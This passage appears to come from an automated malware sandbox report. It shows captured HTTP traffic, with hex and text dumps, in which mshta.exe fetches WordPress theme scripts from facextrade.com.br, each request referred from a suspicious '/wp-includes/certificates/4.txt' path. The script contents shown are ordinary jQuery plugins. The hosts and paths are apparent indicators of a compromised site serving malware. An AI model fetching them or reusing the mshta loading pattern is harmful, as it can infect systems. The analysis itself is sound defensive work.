61 75 6c 74 73 2c 20 6f 70 74 69 6f 6e 73 20 29 2c 0a 09 09 09 65 6c 20 3d 20 24 28 74 68 69 73 29 3b 0a 0a 09 09 24 28 22 68 65 61 64 22 29 2e 61 70 70 65 6e 64 28 27 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 7b 2e 73 66 2d 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 20 2e 73 65 6c 65 63 74 2d 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 7d 7d 3c 2f 73 74 79 6c 65 3e 27 29 0a 0a 09 09 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 09 2f 2f 20 61 64 20 63 6c 61 73 73 20 74 6f 20 73 75 62 6d 65 6e 75 20 6c 69 73 74 0a 09 09 09 65 6c 2e 66 69 6e 64 28 27 75 6c 27 29 2e 61 64 64 43 6c 61 73 73 28 73 65 74 74 69 6e 67 73 2e 73 75 62 4d 65 6e 75 43 6c 61 73 73 29 3b 0a 0a 09 09 09 2f 2f 20 43 72 65 61 74 65 20 62 61 73 65 20 6d 65 6e 75 0a 09 09 09 24 28 27 3c 73 65 6c 65 63 74 20 2f 3e 27 2c 7b 27 63 6c 61 73 73 27 3a 73 65 74 74 69 6e 67 73 2e 63 6c 61 73 73 4e 61 6d 65 7d 29 2e 69 6e 73 65 72 74 41 66 74 65 72 28 65 6c 29 3b 0a 0a 09 09 09 2f 2f 20 43 72 65 61 74 65 20 64 65 66 61 75 6c 74 20 6f 70 74 69 6f 6e 0a 09 09 09 24 28 27 3c 6f 70 74 69 6f 6e 20 2f 3e 27 2c 20 7b 22 76 61 6c 75 65 22 3a 27 23 27 2c 20 22 74 65 78 74 22 3a 73 65 74 74 69 6e 67 73 2e 64 65 66 61 75 6c 74 54 65 78 74 7d 29 2e 61 70 70 65 6e 64 54 6f 28 20 27 2e 27 20 2b 20 73 65 74 74 69 6e 67 73 2e 63 6c 61 73 73 4e 61 6d 65 20 29 3b 0a 0a 09 09 09 2f 2f 20 43 72 65 61 74 65 20 73
                                        Data Ascii: /** * jQuery Mobile Menu * Turn unordered list menu into dropdown select menu * version 1.0(31-OCT-2011) * * Built on top of the jQuery library * http://jquery.com * * Documentation * http://github.com/mambows/mobilemenu */(function($){$.fn.mobileMenu = function(options) {var defaults = {defaultText: 'Navigate to...',className: 'select-menu',subMenuClass: 'sub-menu',subMenuDash: '&ndash;'},settings = $.extend( defaults, options ),el = $(this);$("head").append('<style type="text/css">@media(max-width: 767px){.sf-menu{display:none;} .select-menu{display: block;}}</style>')this.each(function(){// ad class to submenu listel.find('ul').addClass(settings.subMenuClass);// Create base menu$('<select />',{'class':settings.className}).insertAfter(el);// Create default option$('<option />', {"value":'#', "text":settings.defaultText}).appendTo( '.' + settings.className );// Create s
                                        Aug 16, 2022 10:49:06.454969883 CEST2531OUTGET /wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:06.683132887 CEST2545INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:19 GMT
                                        Server: Apache
                                        ETag: "a53533-50bd-58592d4a732c0"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:23 GMT
                                        Content-Length: 20669
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 23795448 24053379
                                        Age: 47
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 21 20 4d 61 67 6e 69 66 69 63 20 50 6f 70 75 70 20 2d 20 76 30 2e 39 2e 33 20 2d 20 32 30 31 33 2d 30 37 2d 31 36 0a 2a 20 68 74 74 70 3a 2f 2f 64 69 6d 73 65 6d 65 6e 6f 76 2e 63 6f 6d 2f 70 6c 75 67 69 6e 73 2f 6d 61 67 6e 69 66 69 63 2d 70 6f 70 75 70 2f 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 33 20 44 6d 69 74 72 79 20 53 65 6d 65 6e 6f 76 3b 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 69 2c 6e 2c 6f 2c 61 2c 72 2c 73 2c 6c 3d 22 43 6c 6f 73 65 22 2c 63 3d 22 42 65 66 6f 72 65 43 6c 6f 73 65 22 2c 64 3d 22 41 66 74 65 72 43 6c 6f 73 65 22 2c 75 3d 22 42 65 66 6f 72 65 41 70 70 65 6e 64 22 2c 70 3d 22 4d 61 72 6b 75 70 50 61 72 73 65 22 2c 66 3d 22 4f 70 65 6e 22 2c 6d 3d 22 43 68 61 6e 67 65 22 2c 67 3d 22 6d 66 70 22 2c 76 3d 22 2e 22 2b 67 2c 68 3d 22 6d 66 70 2d 72 65 61 64 79 22 2c 43 3d 22 6d 66 70 2d 72 65 6d 6f 76 69 6e 67 22 2c 79 3d 22 6d 66 70 2d 70 72 65 76 65 6e 74 2d 63 6c 6f 73 65 22 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 62 3d 21 21 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 49 3d 65 28 77 69 6e 64 6f 77 29 2c 78 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 74 2e 65 76 2e 6f 6e 28 67 2b 65 2b 76 2c 69 29 7d 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 69 2c 6e 2c 6f 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 72 65 74 75 72 6e 20 61 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 6d 66 70 2d 22 2b 74 2c 6e 26 26 28 61 2e 69 6e 6e 65 72 48 54 4d 4c 3d 6e 29 2c 6f 3f 69 26 26 69 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3a 28 61 3d 65 28 61 29 2c 69 26 26 61 2e 61 70 70 65 6e 64 54 6f 28 69 29 29 2c 61 7d 2c 54 3d 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 74 2e 65 76 2e 74 72 69 67 67 65 72 48 61 6e 64 6c 65 72 28 67 2b 69 2c 6e 29 2c 74 2e 73 74 2e 63 61 6c 6c 62 61 63 6b 73 26 26 28 69 3d 69 2e 63 68 61 72 41 74 28 30 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 69 2e 73 6c 69 63 65 28 31 29 2c 74 2e 73 74 2e 63 61 6c 6c 62 61 63 6b 73 5b 69 5d 26 26 74 2e 73 74 2e 63 61 6c 6c 62 61 63 6b 73 5b 69 5d 2e 61 70 70 6c 79 28 74 2c 65 2e 69 73 41 72 72 61 79 28 6e 29 3f 6e 3a 5b 6e 5d 29 29 7d 2c 45 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 28 74 2e 73 74 2e 66 6f 63 75 73 3f 74 2e 63 6f 6e 74 65 6e 74 2e 66 69 6e 64 28 74 2e 73 74 2e 66 6f 63 75 73 29 2e 65 71 28 30 29 3a 74 2e 77 72 61 70 29 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 7d 2c 53 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 3d 73 26 26 74 2e 63 75 72 72 54 65 6d 70 6c 61 74 65 2e 63 6c 6f 73 65 42 74 6e 7c 7c 28 74 2e 63 75 72 72 54 65 6d 70 6c 61 74 65 2e 63 6c 6f 73 65 42 74 6e 3d 65 28 74 2e 73 74 2e 63 6c 6f 73 65 4d 61 72 6b 75 70 2e 72 65 70 6c 61 63 65 28 22 25 74 69 74 6c 65 25 22 2c 74 2e 73 74 2e 74 43 6c 6f 73 65 29 29 2c 73 3d 69 29 2c 74 2e 63 75 72 72 54
                                        Data Ascii: /*! Magnific Popup - v0.9.3 - 2013-07-16* http://dimsemenov.com/plugins/magnific-popup/* Copyright (c) 2013 Dmitry Semenov; */(function(e){var t,i,n,o,a,r,s,l="Close",c="BeforeClose",d="AfterClose",u="BeforeAppend",p="MarkupParse",f="Open",m="Change",g="mfp",v="."+g,h="mfp-ready",C="mfp-removing",y="mfp-prevent-close",w=function(){},b=!!window.jQuery,I=e(window),x=function(e,i){t.ev.on(g+e+v,i)},k=function(t,i,n,o){var a=document.createElement("div");return a.className="mfp-"+t,n&&(a.innerHTML=n),o?i&&i.appendChild(a):(a=e(a),i&&a.appendTo(i)),a},T=function(i,n){t.ev.triggerHandler(g+i,n),t.st.callbacks&&(i=i.charAt(0).toLowerCase()+i.slice(1),t.st.callbacks[i]&&t.st.callbacks[i].apply(t,e.isArray(n)?n:[n]))},E=function(){(t.st.focus?t.content.find(t.st.focus).eq(0):t.wrap).trigger("focus")},S=function(i){return i===s&&t.currTemplate.closeBtn||(t.currTemplate.closeBtn=e(t.st.closeMarkup.replace("%title%",t.st.tClose)),s=i),t.currT
                                        Aug 16, 2022 10:49:06.689131021 CEST2567OUTGET /wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:06.917140007 CEST2578INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:19 GMT
                                        Server: Apache
                                        ETag: "a53571-9ca-58592d4b67500"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:24 GMT
                                        Content-Length: 2506
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 22075871 24053381
                                        Age: 47
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 0a 09 24 2e 66 6e 2e 74 6d 53 74 69 63 6b 55 70 3d 66 75 6e 63 74 69 6f 6e 28 6f 70 74 69 6f 6e 73 29 7b 0a 0a 09 09 76 61 72 20 67 65 74 4f 70 74 69 6f 6e 73 20 3d 20 7b 0a 09 09 09 63 6f 72 72 65 63 74 69 6f 6e 53 65 6c 65 63 74 6f 72 3a 20 24 28 27 2e 63 6f 72 72 65 63 74 69 6f 6e 53 65 6c 65 63 74 6f 72 27 29 0a 09 09 2c 09 6c 69 73 74 65 6e 53 65 6c 65 63 74 6f 72 3a 20 24 28 27 2e 6c 69 73 74 65 6e 53 65 6c 65 63 74 6f 72 27 29 0a 09 09 2c 09 61 63 74 69 76 65 3a 20 66 61 6c 73 65 0a 09 09 2c 09 70 73 65 75 64 6f 3a 20 74 72 75 65 0a 09 09 7d 0a 09 09 24 2e 65 78 74 65 6e 64 28 67 65 74 4f 70 74 69 6f 6e 73 2c 20 6f 70 74 69 6f 6e 73 29 3b 0a 0a 09 09 76 61 72 0a 09 09 09 5f 74 68 69 73 20 3d 20 24 28 74 68 69 73 29 0a 09 09 2c 09 5f 77 69 6e 64 6f 77 20 3d 20 24 28 77 69 6e 64 6f 77 29 0a 09 09 2c 09 5f 64 6f 63 75 6d 65 6e 74 20 3d 20 24 28 64 6f 63 75 6d 65 6e 74 29 0a 09 09 2c 09 74 68 69 73 4f 66 66 73 65 74 54 6f 70 20 3d 20 30 0a 09 09 2c 09 74 68 69 73 4f 75 74 65 72 48 65 69 67 68 74 20 3d 20 30 0a 09 09 2c 09 74 68 69 73 4d 61 72 67 69 6e 54 6f 70 20 3d 20 30 0a 09 09 2c 09 74 68 69 73 50 61 64 64 69 6e 67 54 6f 70 20 3d 20 30 0a 09 09 2c 09 64 6f 63 75 6d 65 6e 74 53 63 72 6f 6c 6c 20 3d 20 30 0a 09 09 2c 09 70 73 65 75 64 6f 42 6c 6f 63 6b 0a 09 09 2c 09 6c 61 73 74 53 63 72 6f 6c 6c 56 61 6c 75 65 20 3d 20 30 0a 09 09 2c 09 73 63 72 6f 6c 6c 44 69 72 20 3d 20 27 27 0a 09 09 2c 09 74 6d 70 53 63 72 6f 6c 6c 65 64 0a 09 09 3b 0a 0a 09 09 69 66 20 28 5f 74 68 69 73 2e 6c 65 6e 67 74 68 20 21 3d 20 30 29 20 7b 0a 09 09 09 69 6e 69 74 28 29 3b 0a 09 09 7d 0a 0a 09 09 66 75 6e 63 74 69 6f 6e 20 69 6e 69 74 28 29 7b 0a 09 09 09 74 68 69 73 4f 66 66 73 65 74 54 6f 70 20 3d 20 70 61 72 73 65 49 6e 74 28 5f 74 68 69 73 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 29 3b 0a 09 09 09 74 68 69 73 4d 61 72 67 69 6e 54 6f 70 20 3d 20 70 61 72 73 65 49 6e 74 28 5f 74 68 69 73 2e 63 73 73 28 22 6d 61 72 67 69 6e 2d 74 6f 70 22 29 29 3b 0a 09 09 09 74 68 69 73 4f 75 74 65 72 48 65 69 67 68 74 20 3d 20 70 61 72 73 65 49 6e 74 28 5f 74 68 69 73 2e 6f 75 74 65 72 48 65 69 67 68 74 28 74 72 75 65 29 29 3b 0a 0a 09 09 09 69 66 28 67 65 74 4f 70 74 69 6f 6e 73 2e 70 73 65 75 64 6f 29 7b 0a 09 09 09 09 24 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 73 65 75 64 6f 53 74 69 63 6b 79 42 6c 6f 63 6b 22 3e 3c 2f 64 69 76 3e 27 29 2e 69 6e 73 65 72 74 41 66 74 65 72 28 5f 74 68 69 73 29 3b 0a 09 09 09 09 70 73 65 75 64 6f 42 6c 6f 63 6b 20 3d 20 24 28 27 2e 70 73 65 75 64 6f 53 74 69 63 6b 79 42 6c 6f 63 6b 27 29 3b 0a 09 09 09 09 70 73 65 75 64 6f 42 6c 6f 63 6b 2e 63 73 73 28 7b 22 70 6f 73 69 74 69 6f 6e 22 3a 22 72 65 6c 61 74 69 76 65 22 2c 20 22 64 69 73 70 6c 61 79 22 3a 22 62 6c 6f 63 6b 22 7d 29 3b 0a 09 09 09 7d 0a 0a 09 09 09 69 66 28 67 65 74 4f 70 74 69 6f 6e 73 2e 61 63 74 69 76 65 29 7b 0a 09 09 09 09 61 64 64 45 76 65 6e 74 73 46 75 6e
                                        Data Ascii: (function($){$.fn.tmStickUp=function(options){var getOptions = {correctionSelector: $('.correctionSelector'),listenSelector: $('.listenSelector'),active: false,pseudo: true}$.extend(getOptions, options);var_this = $(this),_window = $(window),_document = $(document),thisOffsetTop = 0,thisOuterHeight = 0,thisMarginTop = 0,thisPaddingTop = 0,documentScroll = 0,pseudoBlock,lastScrollValue = 0,scrollDir = '',tmpScrolled;if (_this.length != 0) {init();}function init(){thisOffsetTop = parseInt(_this.offset().top);thisMarginTop = parseInt(_this.css("margin-top"));thisOuterHeight = parseInt(_this.outerHeight(true));if(getOptions.pseudo){$('<div class="pseudoStickyBlock"></div>').insertAfter(_this);pseudoBlock = $('.pseudoStickyBlock');pseudoBlock.css({"position":"relative", "display":"block"});}if(getOptions.active){addEventsFun
                                        Aug 16, 2022 10:49:06.925270081 CEST2580OUTGET /wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:07.154262066 CEST2586INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:20 GMT
                                        Server: Apache
                                        ETag: "a53555-2a0a-58592d4a732c0"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:23 GMT
                                        Content-Length: 10762
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 22075872 24053383
                                        Age: 47
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 66 6e 2e 7a 41 63 63 6f 72 64 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 64 3d 7b 74 69 6d 65 6f 75 74 3a 36 30 30 30 2c 77 69 64 74 68 3a 6e 75 6c 6c 2c 73 6c 69 64 65 57 69 64 74 68 3a 6e 75 6c 6c 2c 74 61 62 57 69 64 74 68 3a 6e 75 6c 6c 2c 68 65 69 67 68 74 3a 6e 75 6c 6c 2c 73 74 61 72 74 69 6e 67 53 6c 69 64 65 3a 30 2c 73 6c 69 64 65 43 6c 61 73 73 3a 6e 75 6c 6c 2c 65 61 73 69 6e 67 3a 6e 75 6c 6c 2c 73 70 65 65 64 3a 31 32 30 30 2c 61 75 74 6f 3a 74 72 75 65 2c 74 72 69 67 67 65 72 3a 22 63 6c 69 63 6b 22 2c 70 61 75 73 65 3a 74 72 75 65 2c 69 6e 76 65 72 74 3a 66 61 6c 73 65 2c 61 6e 69 6d 61 74 69 6f 6e 53 74 61 72 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 61 6e 69 6d 61 74 69 6f 6e 43 6f 6d 70 6c 65 74 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 62 75 69 6c 64 43 6f 6d 70 6c 65 74 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 65 72 72 6f 72 73 3a 66 61 6c 73 65 7d 2c 63 3d 7b 64 69 73 70 6c 61 79 45 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 66 29 7b 69 66 28 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 26 26 66 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 7a 41 63 63 6f 72 64 69 6f 6e 3a 20 22 2b 67 2b 22 2e 22 29 7d 7d 2c 66 69 6e 64 43 68 69 6c 64 45 6c 65 6d 65 6e 74 73 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 69 66 28 66 2e 63 68 69 6c 64 72 65 6e 28 29 2e 67 65 74 28 30 29 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 65 6c 73 65 7b 72 65 74 75 72 6e 20 74 72 75 65 7d 7d 2c 67 65 74 4e 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 76 61 72 20 66 3d 68 2b 31 3b 69 66 28 66 3e 3d 67 29 7b 66 3d 30 7d 72 65 74 75 72 6e 20 66 7d 2c 66 69 78 48 65 69 67 68 74 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 69 66 28 28 66 2e 68 65 69 67 68 74 3d 3d 3d 6e 75 6c 6c 29 26 26 28 66 2e 73 6c 69 64 65 48 65 69 67 68 74 21 3d 3d 75 6e 64 65 66 69 6e 65 64 29 29 7b 66 2e 68 65 69 67 68 74 3d 66 2e 73 6c 69 64 65 48 65 69 67 68 74 3b 72 65 74 75 72 6e 20 74 72 75 65 7d 65 6c 73 65 7b 69 66 28 28 66 2e 68 65 69 67 68 74 21 3d 3d 6e 75 6c 6c 29 26 26 28 66 2e 73 6c 69 64 65 48 65 69 67 68 74 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 29 7b 72 65 74 75 72 6e 20 74 72 75 65 7d 65 6c 73 65 7b 69 66 28 28 66 2e 68 65 69 67 68 74 3d 3d 3d 6e 75 6c 6c 29 26 26 28 66 2e 73 6c 69 64 65 48 65 69 67 68 74 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 29 7b 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 7d 7d 7d 2c 67 65 74 55 6e 69 74 73 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 69 66 28 66 21 3d 3d 6e 75 6c 6c 29 7b 69 66 28 66 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 25 22 29 3e 2d 31 29 7b 72 65 74 75 72 6e 22 25 22 7d 65 6c 73 65 7b 69 66 28 66 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 70 78 22 29 3e 2d 31 29 7b 72 65 74 75 72 6e 22 70 78 22 7d 65 6c 73 65 7b 72 65 74 75 72 6e
                                        Data Ascii: (function(a){a.fn.zAccordion=function(e){var d={timeout:6000,width:null,slideWidth:null,tabWidth:null,height:null,startingSlide:0,slideClass:null,easing:null,speed:1200,auto:true,trigger:"click",pause:true,invert:false,animationStart:function(){},animationComplete:function(){},buildComplete:function(){},errors:false},c={displayError:function(g,f){if(window.console&&f){console.log("zAccordion: "+g+".")}},findChildElements:function(f){if(f.children().get(0)===undefined){return false}else{return true}},getNext:function(g,h){var f=h+1;if(f>=g){f=0}return f},fixHeight:function(f){if((f.height===null)&&(f.slideHeight!==undefined)){f.height=f.slideHeight;return true}else{if((f.height!==null)&&(f.slideHeight===undefined)){return true}else{if((f.height===null)&&(f.slideHeight===undefined)){return false}}}},getUnits:function(f){if(f!==null){if(f.toString().indexOf("%")>-1){return"%"}else{if(f.toString().indexOf("px")>-1){return"px"}else{return
                                        Aug 16, 2022 10:49:07.165354967 CEST2596OUTGET /wp-includes/js/wp-embed.min.js?ver=4.9.20 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:07.393191099 CEST2639INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:20 GMT
                                        Server: Apache
                                        ETag: "a55f36-56f-5c001a3bfb868"
                                        Last-Modified: Thu, 15 Apr 2021 12:02:38 GMT
                                        Content-Length: 1391
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 22075873 21534545
                                        Age: 47
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 21 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 21 31 2c 6e 3d 21 31 3b 69 66 28 64 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 69 66 28 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 65 3d 21 30 3b 69 66 28 63 2e 77 70 3d 63 2e 77 70 7c 7c 7b 7d 2c 21 63 2e 77 70 2e 72 65 63 65 69 76 65 45 6d 62 65 64 4d 65 73 73 61 67 65 29 69 66 28 63 2e 77 70 2e 72 65 63 65 69 76 65 45 6d 62 65 64 4d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 64 61 74 61 3b 69 66 28 74 29 69 66 28 74 2e 73 65 63 72 65 74 7c 7c 74 2e 6d 65 73 73 61 67 65 7c 7c 74 2e 76 61 6c 75 65 29 69 66 28 21 2f 5b 5e 61 2d 7a 41 2d 5a 30 2d 39 5d 2f 2e 74 65 73 74 28 74 2e 73 65 63 72 65 74 29 29 7b 66 6f 72 28 76 61 72 20 72 2c 61 2c 69 2c 73 3d 64 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 69 66 72 61 6d 65 5b 64 61 74 61 2d 73 65 63 72 65 74 3d 22 27 2b 74 2e 73 65 63 72 65 74 2b 27 22 5d 27 29 2c 6e 3d 64 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 62 6c 6f 63 6b 71 75 6f 74 65 5b 64 61 74 61 2d 73 65 63 72 65 74 3d 22 27 2b 74 2e 73 65 63 72 65 74 2b 27 22 5d 27 29 2c 6f 3d 30 3b 6f 3c 6e 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 6e 5b 6f 5d 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 3b 66 6f 72 28 6f 3d 30 3b 6f 3c 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 69 66 28 72 3d 73 5b 6f 5d 2c 65 2e 73 6f 75 72 63 65 3d 3d 3d 72 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 29 7b 69 66 28 72 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 73 74 79 6c 65 22 29 2c 22 68 65 69 67 68 74 22 3d 3d 3d 74 2e 6d 65 73 73 61 67 65 29 7b 69 66 28 31 65 33 3c 28 69 3d 70 61 72 73 65 49 6e 74 28 74 2e 76 61 6c 75 65 2c 31 30 29 29 29 69 3d 31 65 33 3b 65 6c 73 65 20 69 66 28 7e 7e 69 3c 32 30 30 29 69 3d 32 30 30 3b 72 2e 68 65 69 67 68 74 3d 69 7d 69 66 28 22 6c 69 6e 6b 22 3d 3d 3d 74 2e 6d 65 73 73 61 67 65 29 69 66 28 61 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 2c 69 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 2c 61 2e 68 72 65 66 3d 72 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 29 2c 69 2e 68 72 65 66 3d 74 2e 76 61 6c 75 65 2c 69 2e 68 6f 73 74 3d 3d 3d 61 2e 68 6f 73 74 29 69 66 28 64 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 3d 3d 72 29 63 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 74 2e 76 61 6c 75 65 7d 7d 7d 2c 65 29 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 63 2e 77 70 2e 72 65 63 65 69 76 65 45 6d 62 65 64 4d 65 73 73 61 67 65 2c 21 31 29 2c 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 74 2c 21 31 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 74 2c 21 31 29 3b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 69 66 28 21 6e 29 7b 6e 3d 21 30 3b 66 6f 72 28 76 61 72 20
                                        Data Ascii: !function(c,d){"use strict";var e=!1,n=!1;if(d.querySelector)if(c.addEventListener)e=!0;if(c.wp=c.wp||{},!c.wp.receiveEmbedMessage)if(c.wp.receiveEmbedMessage=function(e){var t=e.data;if(t)if(t.secret||t.message||t.value)if(!/[^a-zA-Z0-9]/.test(t.secret)){for(var r,a,i,s=d.querySelectorAll('iframe[data-secret="'+t.secret+'"]'),n=d.querySelectorAll('blockquote[data-secret="'+t.secret+'"]'),o=0;o<n.length;o++)n[o].style.display="none";for(o=0;o<s.length;o++)if(r=s[o],e.source===r.contentWindow){if(r.removeAttribute("style"),"height"===t.message){if(1e3<(i=parseInt(t.value,10)))i=1e3;else if(~~i<200)i=200;r.height=i}if("link"===t.message)if(a=d.createElement("a"),i=d.createElement("a"),a.href=r.getAttribute("src"),i.href=t.value,i.host===a.host)if(d.activeElement===r)c.top.location.href=t.value}}},e)c.addEventListener("message",c.wp.receiveEmbedMessage,!1),d.addEventListener("DOMContentLoaded",t,!1),c.addEventListener("load",t,!1);function t(){if(!n){n=!0;for(var


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.2249177104.18.11.20780C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
